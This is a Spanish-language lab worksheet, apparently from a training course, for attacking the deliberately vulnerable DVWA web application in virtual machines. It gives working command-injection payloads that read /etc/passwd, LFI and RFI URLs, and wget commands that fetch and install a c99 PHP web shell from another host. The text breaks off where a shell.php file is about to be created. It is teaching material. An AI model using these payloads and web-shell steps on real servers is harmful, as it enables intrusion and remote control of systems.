LAB Hackeando Aplicaciones Web

Hackeando Aplicaciones Web PROCEDIMIENTO : 1.- Abrir la Máquina Virtual DVWA (Modo NAT) y verificar la dirección IP asig

Views 61 Downloads 0 File size 946KB

Report DMCA / Copyright

DOWNLOAD FILE

Recommend stories

Citation preview

Hackeando Aplicaciones Web PROCEDIMIENTO : 1.- Abrir la Máquina Virtual DVWA (Modo NAT) y verificar la dirección IP asignada 2.- Desde otra Máquina Virtual en modo NAT, ingresar a la página web de DVWA http://IP_Maquina_DVWA Usuario (username) Contraseña (password)

: admin. : password.

Luego de logearse en la página, verificar si la base de datos ha sido creada, sino crearla, seleccionando el menú: Setup > Create / Reset Database

Pág. 1 de 12

COMMAND EXECUTION Esta vulnerabilidad permite ejecutar comandos de consola desde la web, pudiendo así ver, modificar y eliminar archivos y directorios del servidor. Las posibilidades de este ataque son infinitas, siendo su única limitación el usuario utilizado en la ejecución de los comandos (generalmente “apache”), por lo que para realizar ciertas acciones se dependería de los permisos que éste tenga. Primero Seleccionar el nivel de seguridad a low: DVWA Security : low

Seleccionar la Opcion: Command Execution

Ingresar los siguientes comandos: Comando 1 : ;pwd Comando 2 : || ls –l / Comando 3 : 192.168.21.149 && cat /proc/cpuinfo Comando 4 : & cat /etc/passwd

Subir al Servidor DVWA una Shell creada previamente y escrita en PHP con nombre c99.zip , esta se encuentra ubicada en la maquina Windows 7 en el directorio www/master , verificar que WAMP server está activado, luego ejecutar el siguiente comando Comando : ; cd ../ ; cd upload ; wget http://direccion_ip_maq_Win7/master/c99.zip ; unzip c99.zip

Desde el navegador de win7 ir la siguiente URL: http://IP_Server_DVWA/vulnerabilities/upload/c99.php?act=cmd

Pág. 2 de 12

Cambiar a la Opcion de Seguridad : Medium Volver a ejecutar los comandos anteriores. Indicar cuales comandos si funcionaron: ____________________________________________

Probar lo siguiente: Comando : || cat /etc/passwd Comando : & cat /etc/passwd & pwd

FILE INCLUSION Este tipo de vulnerabilidad está referida a la ejecución en el servidor web de ficheros locales o externos (al propio servidor) diferentes a los esperados. Se diferencian por tanto dos tipos de ataques diferentes: LFI o Local File Inclusion, y RFI o Remote File Inclusion. RFI, traducido al español como Inclusión Remota de Archivos, y LFI, traducido como Inclusión Local de Archivos, son dos tipos de vulnerabilidad que se pueden encontrar en páginas web PHP y se producen a causa de una mala programación haciendo uso de las funciones include, include_once, require, require_once y fopen (en el caso particular de RFI) con parámetros procedentes del usuario. 1. Primero Seleccionar el nivel de seguridad a low: DVWA Security : low

Seleccionamos del Menu la opción: File Inclusion

Verificar que la URL incluye el llamado de un archivo include.php

Pág. 3 de 12

Vamos a cambiar en el URL y empezar a llamar a ficheros locales del servidor (LFI) y tener acceso al mismo o un script alojado en un servidor externo y que éste se ejecutase en el servidor web (RFI). Vamos a verificar la vulnerabilidad LFI cambiando el URL actual por los siguientes URL, verificar cual es el resultado:

http://ip_server_dvwa/vulnerabilities/fi/?page=/ http://ip_server_dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd Probar viendo otros archivos locales del servidor

_____________________________________________________________

Para que sea vulnerable a RFI el servidor tendrá que tener habilitada en la configuración PHP la directiva de seguridad allow_url_include. Ejecutar las siguientes URL http://ip_server_dvwa/vulnerabilities/fi/?page=http://www.google.com

Vamos a cargar una Shell ubicada en nuestro maquina Windows 7 Descargar de la página http://www.r57shell.net/, el archivo c99.txt y copiarlo en Maq_win7 en www/master, luego ejecutar: http://ip_server_dvwa/vulnerabilities/fi/?page=http://ip_win7/master/c99.txt&act=cmd

2. Seleccionar el nivel de seguridad a medium: DVWA Security : mediun Vamos a verificar la vulnerabilidad LFI y RFI cambiando el URL actual por los siguientes URL, verificar cual es el resultado:

http://ip_server_dvwa/vulnerabilities/fi/?page=/etc/passwd http://ip_server_dvwa/vulnerabilities/fi/?page=http://www.google.com Cual no funciono : _____________________________________________

El objetivo del atacante en este caso es encontrar un directorio que tenga permisos de escritura para todos los usuarios dado que al ejecutar estos comandos no se hace como root sino con el usuario apache, que generalmente no tiene permisos administrativos En caso de encontrar un directorio con los permisos necesarios el próximo paso será intentar subir un fichero al servidor en dicho directorio y aprovechar que el script PHP es vulnerable a LFI para ejecutarlo en el servidor. Se solicita la página http://ip_server_dvwa/vulnerabilities/fi/?page=data:,&cmd=ls –l ../ Pág. 4 de 12

y, como se observa, el directorio upload tiene permisos de lectura, escritura y ejecución para todos los usuarios. A continuación se encapsulará otro comando usando data:, esta vez para cargar en el directorio para el que se tienen permisos de escritura una shell escrita en PHP alojada en un servidor externo: Descargar de la página http://www.r57shell.net/, el archivo c99.txt y copiarlo en Maq_win7 en www/master http://ip_server_dvwa/vulnerabilities/fi/?page=data:,&cmd=wget http://ip_maq_win7/master/c99.txt -O /srv/www/ip_server_dvwa/public_html/vulnerabilities/upload/c99.php Para probar la vulnerabilidad, acceder a la siguiente URL: http://ip_server_dvwa/vulnerabilities/upload/c99.php

Ahora, crearemos el archivo: shell.php con el siguiente contenido: